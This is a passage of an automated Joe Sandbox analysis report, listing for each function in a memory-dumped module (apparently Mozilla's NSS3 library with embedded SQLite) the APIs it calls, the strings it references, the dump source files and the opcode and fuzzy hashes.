                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC1F675B007059BEB04CF65CC80BAABBB4FF05308F244129E9299BB51E731F956CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEED0A
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEEE68
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEEF87
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CDEEF98
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6CDEF492
                                                                                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDEF483
                                                                                                                                                                                                                                                                                                                      • database corruption, xrefs: 6CDEF48D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 34120516495604f96a14a14479087d932af7fe7a851cf14f8ebb80e99148a798
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a74c8eb142bbde61156441007a3ebc6fefbeea2fe9ea3bef1e7ad4fc5e52232
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34120516495604f96a14a14479087d932af7fe7a851cf14f8ebb80e99148a798
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97620271A04245CFEB14CF64D480BAABBF1BF4D318F18419DD855ABBA2D735E886CB90
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6CE87DDC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE68298,?,?,?,6CE5FCE5,?), ref: 6CEC07BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEC07E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC081B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC0825
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CE87DF3
                                                                                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CE87F07
                                                                                                                                                                                                                                                                                                                      • PK11_GetPadMechanism.NSS3(00000000), ref: 6CE87F57
                                                                                                                                                                                                                                                                                                                      • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CE87F98
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6CE87FC9
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE87FDE
                                                                                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CE88000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CE87F0C,?,00000000,00000000,00000000,?), ref: 6CEA943B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CEA946B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CEA9546
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE88110
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CE8811D
                                                                                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CE8822D
                                                                                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CE8823C
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1923011919-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: fa3af2f9b6deb4f874b9285c1e1d31dd22c9678a5f931d84490477a323e0036c
                                                                                                                                                                                                                                                                                                                      • Instruction ID: dc50d44e492390c6a4afbe6a4c9793956b7a62f09486e447e489da823b132c4e
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa3af2f9b6deb4f874b9285c1e1d31dd22c9678a5f931d84490477a323e0036c
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14C18EB1D012199FEB21CF54CC40FEAB7B8AF05348F1481EAE81DA6651E7319E85CFA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_PubDeriveWithKDF.NSS3 ref: 6CE90F8D
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE90FB3
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CE91006
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6CE9101C
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CE91033
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CE9103F
                                                                                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6CE91048
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CE9108E
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE910BB
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CE910D6
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CE9112E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CE908C4,?,?), ref: 6CE915B8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CE908C4,?,?), ref: 6CE915C1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE9162E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE91570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE91637
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d9f209b81c4795be7325b93e35c9c01382a17e6b650028c03b02a0bc4790af1
                                                                                                                                                                                                                                                                                                                      • Instruction ID: a9cb322a748a479f71a9a730f79345dfa911bd514ca515b934cc569402b23ffc
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d9f209b81c4795be7325b93e35c9c01382a17e6b650028c03b02a0bc4790af1
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7871F0B5A002059FDB04CFA9CC81AAAB7B9BF4831CF24862DE91997711E732D945CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CEB1F19
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CEB2166
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CEB228F
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CEB23B8
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEB241C
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$Error
                                                                                                                                                                                                                                                                                                                      • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                                                                      • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 27da0607ba2681247f206bb1a21610def8a31c415778188d8882645f8981299b
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 33b89f1f9057ead552ad4d042888391fa017b3aa813932066a220554d84b1e3b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27da0607ba2681247f206bb1a21610def8a31c415778188d8882645f8981299b
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39025D62D0CBC86EF73282B1C54D3E76AF09F5532CF28166EC59E5A783C3B859898351
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE61C6F,00000000,00000004,?,?), ref: 6CEB6C3F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CE61C6F,00000000,00000004,?,?), ref: 6CEB6C60
                                                                                                                                                                                                                                                                                                                      • PR_ExplodeTime.NSS3(00000000,6CE61C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CE61C6F,00000000,00000004,?,?), ref: 6CEB6C94
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                      • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3267be391b3135d4ff506203b0a36f49c477e3ce0f073ac92bfcea14c20fc344
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e168065a69b908d849849104eec7c320e0becf973fe64c3625c6e01cad1d5555
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3267be391b3135d4ff506203b0a36f49c477e3ce0f073ac92bfcea14c20fc344
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6514D72B015494FC70CCDADDC527EAB7EA9BA4310F48C23AE442DB785D638E906C751
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CF31027
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF310B2
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF31353
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                                                                                                      • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                                                      • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 26ba0fb920c004cf7450e23bc97c941d536169dcac682e200f1cc445e89f9d49
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 807d655bdf2eb9b13252fe4e05a792a4aab767384670ebdc9683b501b5ed0eb3
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26ba0fb920c004cf7450e23bc97c941d536169dcac682e200f1cc445e89f9d49
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E1C171A08350EFD714CF14C880AABBBF5BF85348F15992DE9898BB60D775E845CB82
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF38FEE
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF390DC
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF39118
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF3915C
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF391C2
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF39209
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                      • String ID: 3333$UUUU
                                                                                                                                                                                                                                                                                                                      • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0d866310ec190bea64afe59c46d1a3c4e13aac9495cf59d96aceb0700cf646b5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 77db3bebd1ff562235e6d78a5a613f46cb140fe341c87c1f22c04207509081c2
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d866310ec190bea64afe59c46d1a3c4e13aac9495cf59d96aceb0700cf646b5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81A18272E00125ABDB04CB68CC91BEEB7B5BF48324F094169D919A7751DB3AED01CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: EnterCriticalSection.KERNEL32(?,?,?,6CE4F9C9,?,6CE4F4DA,6CE4F9C9,?,?,6CE1369A), ref: 6CDECA7A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CDECB26
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CDF103E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CDF1139
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CDF1190
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CDF1227
                                                                                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CDF126E
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6CDF127F
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • winAccess, xrefs: 6CDF129B
                                                                                                                                                                                                                                                                                                                      • delayed %dms for lock/sharing conflict at line %d, xrefs: 6CDF1267
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                                                                                      • API String ID: 2733752649-1873940834
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 34c0a32d19aefe5b62604b92bf52558da7f036eb45a9b709b47f6c3ab3319855
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 894f13a81206fdf519e8af3c5e2426c9087ea8192b65e0daa7b424a1d38cba55
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34c0a32d19aefe5b62604b92bf52558da7f036eb45a9b709b47f6c3ab3319855
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 917126B1B45201DBEB449F64DC85B6B3775FF86324F16022AE93587AA0DB30D906CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31,?,?,?,?,?,?,?), ref: 6CDFB039
                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31), ref: 6CDFB090
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31), ref: 6CDFB0A2
                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31,?,?,?,?,?,?,?,?,?), ref: 6CDFB100
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,00000002,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31,?,?,?,?,?,?,?), ref: 6CDFB115
                                                                                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6CF1CF46,?,6CDECDBD,?,6CF1BF31), ref: 6CDFB12D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CDFC6FD,?,?,?,?,6CE4F965,00000000), ref: 6CDE9F0E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CDE9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CE4F965,00000000), ref: 6CDE9F5D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
